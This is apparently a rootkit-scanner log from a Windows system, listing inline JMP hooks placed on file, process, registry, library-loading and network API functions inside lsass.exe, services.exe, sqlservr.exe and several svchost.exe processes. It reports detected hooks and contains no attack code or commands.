.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] WS2_32.dll!socket                                                 772936D1 5 Bytes  JMP 04BC0000 

.text           C:\Windows\system32\services.exe[864] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00100000 

.text           C:\Windows\system32\services.exe[864] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0010002C 

.text           C:\Windows\system32\services.exe[864] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00100011 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 000F0F54 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 000F009A 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 000F0F21 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000F0F32 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 000F0F8A 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 000F0011 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 000F002C 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 000F007F 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 000F0064 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 000F0FB6 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 000F0FA5 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 000F003D 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 000F0F6F 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 000F00D3 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 000F0FDB 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 000F0000 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000F0F43 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 007C006C 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 007C0040 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 007C0FEF 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 007C0051 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 007C007D 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 007C0014 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 007C0FD4 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 007C0025 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 0015004E 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 0015003D 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00150FDE 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00150FEF 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00150FCD 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0015000C 

.text           C:\Windows\system32\services.exe[864] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 007D0000 

.text           C:\Windows\system32\lsass.exe[912] ntdll.dll!NtCreateFile                                                                            778C4224 5 Bytes  JMP 00080FEF 

.text           C:\Windows\system32\lsass.exe[912] ntdll.dll!NtCreateProcess                                                                         778C42E4 5 Bytes  JMP 00080FCA 

.text           C:\Windows\system32\lsass.exe[912] ntdll.dll!NtProtectVirtualMemory                                                                  778C4B84 5 Bytes  JMP 0008000A 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!GetStartupInfoW                                                                      76B11929 5 Bytes  JMP 00070F50 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!GetStartupInfoA                                                                      76B119C9 5 Bytes  JMP 00070096 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateProcessW                                                                       76B11BF3 5 Bytes  JMP 00070F1A 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateProcessA                                                                       76B11C28 5 Bytes  JMP 000700B1 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!VirtualProtect                                                                       76B11DC3 5 Bytes  JMP 00070056 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateNamedPipeA                                                                     76B12EF5 5 Bytes  JMP 0007001B 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateNamedPipeW                                                                     76B15C0C 5 Bytes  JMP 00070FCA 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreatePipe                                                                           76B38E6E 5 Bytes  JMP 00070F6B 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryExW                                                                       76B39109 5 Bytes  JMP 00070F7C 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryW                                                                         76B39362 5 Bytes  JMP 00070F9E 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryExA                                                                       76B394B4 5 Bytes  JMP 00070F8D 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryA                                                                         76B394DC 5 Bytes  JMP 00070FAF 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!VirtualProtectEx                                                                     76B3DBDA 5 Bytes  JMP 0007007B 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!GetProcAddress                                                                       76B5903B 5 Bytes  JMP 00070F09 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateFileW                                                                          76B5AECB 5 Bytes  JMP 00070FE5 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateFileA                                                                          76B5CE5F 5 Bytes  JMP 00070000 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!WinExec                                                                              76BA5CF7 5 Bytes  JMP 00070F35 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyExA                                                                      770539AB 5 Bytes  JMP 00990F8D 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyA                                                                        77053BA9 5 Bytes  JMP 00990025 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyA                                                                          770589C7 5 Bytes  JMP 00990000 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyW                                                                        7706391E 5 Bytes  JMP 00990F9E 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyExW                                                                      770641F1 5 Bytes  JMP 00990F68 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyExA                                                                        77067C42 5 Bytes  JMP 00990FD4 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyW                                                                          7706E2B5 5 Bytes  JMP 00990FEF 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyExW                                                                        77077BA1 5 Bytes  JMP 00990FC3 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_wsystem                                                                               75807F2F 5 Bytes  JMP 00090F97 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!system                                                                                 7580804B 5 Bytes  JMP 00090FA8 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_creat                                                                                 7580BBE1 5 Bytes  JMP 00090022 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_open                                                                                  7580D106 5 Bytes  JMP 00090000 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_wcreat                                                                                7580D326 5 Bytes  JMP 00090FCD 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_wopen                                                                                 7580D501 5 Bytes  JMP 00090011 

.text           C:\Windows\system32\lsass.exe[912] WS2_32.dll!socket                                                                                 772936D1 5 Bytes  JMP 00A00FEF 

.text           C:\Windows\system32\svchost.exe[1088] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00160000 

.text           C:\Windows\system32\svchost.exe[1088] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00160FCA 

.text           C:\Windows\system32\svchost.exe[1088] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00160FE5 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00150F30 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00150076 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00150EF3 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00150F04 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 0015005B 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00150014 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00150FC3 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00150F4B 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00150F83 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 0015002F 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00150040 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00150FA8 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00150F66 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 001500A5 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00150FDE 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00150FEF 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00150F15 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00170FBC 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00170FCD 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00170FDE 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00170000 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00170033 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00170FEF 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00190F9E 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 0019001B 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00190FEF 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00190040 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00190F83 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00190FCA 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0019000A 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00190FB9 

.text           C:\Windows\system32\svchost.exe[1088] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 001A0FEF 

.text           C:\Windows\system32\svchost.exe[1148] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 0016000A 

.text           C:\Windows\system32\svchost.exe[1148] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00160FEF 

.text           C:\Windows\system32\svchost.exe[1148] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 0016001B 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00150F77 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 001500C7 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 001500E9 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 001500D8 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00150091 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00150FEF 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0015004A 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00150F92 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00150FB7 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 0015006C 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00150FD4 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 0015005B 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 001500AC 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00150F41 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00150025 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 0015000A 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00150F66 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 0017005F 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00170044 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00170022 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00170000 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00170033 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00170011 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00180047 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 0018002C 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00180FEF 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00180FAF 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00180058 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00180FCA 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00180000 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00180011 

.text           C:\Windows\system32\svchost.exe[1148] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 003F0000 

.text           C:\Windows\system32\svchost.exe[1284] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00040FEF 

.text           C:\Windows\system32\svchost.exe[1284] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00040014 

.text           C:\Windows\system32\svchost.exe[1284] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040FDE 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00010F55 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 000100A5 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00010F1F 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000100B6 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010076 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010025 


.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 005A0033 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 005A0062 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 005A0022 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 005A0011 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 005A0FC7 

.text           C:\Windows\system32\svchost.exe[1564] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00620FEF 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenA                                                                      76F34E2B 5 Bytes  JMP 00590000 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenUrlA                                                                   76F3BFCE 5 Bytes  JMP 0059002F 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenW                                                                      76F6C03E 5 Bytes  JMP 00590FEF 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenUrlW                                                                   76F9D722 5 Bytes  JMP 00590040 

.text           C:\Windows\system32\svchost.exe[1764] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 01060000 

.text           C:\Windows\system32\svchost.exe[1764] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0106002F 

.text           C:\Windows\system32\svchost.exe[1764] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 01060FEF 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 01000075 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 01000064 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 010000A1 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 01000090 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 01000049 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 01000011 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 01000FB6 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 01000F43 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 01000F6F 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 01000022 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 01000F80 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 01000FA5 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 01000F54 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 01000EEF 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 01000000 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 01000FE5 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 01000F1E 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00440FB2 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 0044003D 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00440011 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00440000 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 0044002C 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00440FD7 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 01010FB9 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 01010FDB 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 01010000 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 01010FCA 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 01010FA8 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 0101002C 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0101001B 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0101003D 

.text           C:\Windows\system32\svchost.exe[1764] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 010F0FEF 

.text           C:\Windows\system32\svchost.exe[1988] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 003D0FEF 

.text           C:\Windows\system32\svchost.exe[1988] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 003D0014 

.text           C:\Windows\system32\svchost.exe[1988] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 003D0FD4 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 003200B3 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00320F63 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 003200FA 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 003200E9 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00320FA0 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 0032002C 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0032003D 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00320F74 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00320084 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00320FC7 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00320069 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 0032004E 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00320F8F 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 0032010B 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00320011 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00320000 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 003200CE 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 002E0016 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 002E0F95 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 002E0FB7 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 002E0FEF 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 002E0FA6 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 002E0FDE 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00370F91 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00370033 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00370FE5 

